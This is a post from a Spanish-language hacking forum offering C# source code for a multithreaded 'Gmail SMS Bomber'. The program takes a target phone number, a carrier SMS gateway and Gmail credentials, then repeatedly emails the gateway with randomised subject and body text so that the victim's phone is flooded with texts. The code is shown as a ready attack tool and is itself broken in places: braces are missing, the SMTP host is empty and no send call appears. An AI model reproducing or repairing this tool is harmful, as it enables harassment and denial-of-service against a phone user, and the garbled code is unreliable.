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[C#] Gmail SMS Bomber (MultiThreaded)

Autor Tema: [C#] Gmail SMS Bomber (MultiThreaded)  (Leído 1301 veces)

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[C#] Gmail SMS Bomber (MultiThreaded)
« en: Diciembre 26, 2015, 09:00:13 am »
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#+- Title: Gmail SMS Bomber (MultiThreaded)
#+- Author: Cynical
#+- Category: Tools eMail
#+- Description: This source is a simple SMS Bomber that uses GMail's SMTP server to issue an email to the target SMS Gateway to, in turn, issue an SMS to the target number. Tested it using T-Mobile and it worked pretty well.
#+- Note: I tested it on my own T-Mobile device and it worked fine. Make sure you include the 3 digit area code before the number. The point in using this application rather than creating an EMail on GMail's website is automation.  You need also chante security settings in google account.

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using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Net.Mail;

namespace ConsoleApplication3
    class Program
        static void Main(string[] args)
            Console.WriteLine("*****************SMS BOMBER******BY 'CYNICAL**********************************");
            Console.WriteLine("*Find a list of SMS Gateways here: [url][/url]**");
                // Collect target data
            Console.WriteLine("We will now collect some information on the target.");
            Console.WriteLine("Enter target phone number:");
            String Number = Console.ReadLine();
            Console.WriteLine("Enter SMS Gateway:");
            String Gateway = Console.ReadLine();
                // Collect email data
            Console.WriteLine("We will now set the email's data.");
            Console.WriteLine("Amount to send:");
            String Kek1 = Console.ReadLine();
            Console.WriteLine("Enter Subject:");
            String Subject = Console.ReadLine();
            Console.WriteLine("Enter Body:");
            String Body = Console.ReadLine();
                // Collect GMail Login Details
            Console.WriteLine("We will now collect some GMail login credentials to issue to SMS messages.");
            Console.WriteLine("GMail Username:");
            String[] Split = Console.ReadLine().Split(new[]{ '@' }); // Splits Entered username at '@' creating 2 values, one being the username, the other being the domain.
            Console.WriteLine("Gmail Password:");
            String Password = Console.ReadLine();
                // Actual SMS Sending
            int Kek = 0; // Set number used as representation of amount sent
            int Kek2 = 0;
            bool result = int.TryParse(Kek1, out Kek2); // Convert target amount to DOUBLE so it may be compared using '<'
            while (Kek < Kek2) {

                                try {
                                    double Per1 = Kek; // Create doubles for purpose of calculating progress
                                    double Per2 = Kek2;
                                                Random random = new Random(); // Used for rnd number in body
                                                // Contact GMail's SMTP server and send email
                                                MailMessage SMS = new MailMessage();
                                                SmtpClient GMail = new SmtpClient("");
                                                SMS.From = new MailAddress(Split[0] + "");
                                                SMS.To.Add(Number + "@" + Gateway);
                                                SMS.Subject = Subject + " " + random.Next(30000, 1000000);
                                                SMS.Body = Body + " " + random.Next(30000, 1000000);
                                                GMail.Port = 587;
                                                GMail.Credentials = new System.Net.NetworkCredential(Split[0], Password);
                                                GMail.EnableSsl = true;
                                                Double percent = (Per1 / Per2) * 100;
                                                Console.WriteLine("Progress: " + Math.Round(percent, 2) + "% (~" + Per1 + " Sent)");
                                catch (Exception)
                                                Console.WriteLine("An error occured. Press enter to retry or say quit.");
                                                String input = Console.ReadLine();
                                    if (input == "quit")
            Console.WriteLine("Finished bombing. Press any key to continue.");

Fuente:Zephomet / el-hacker
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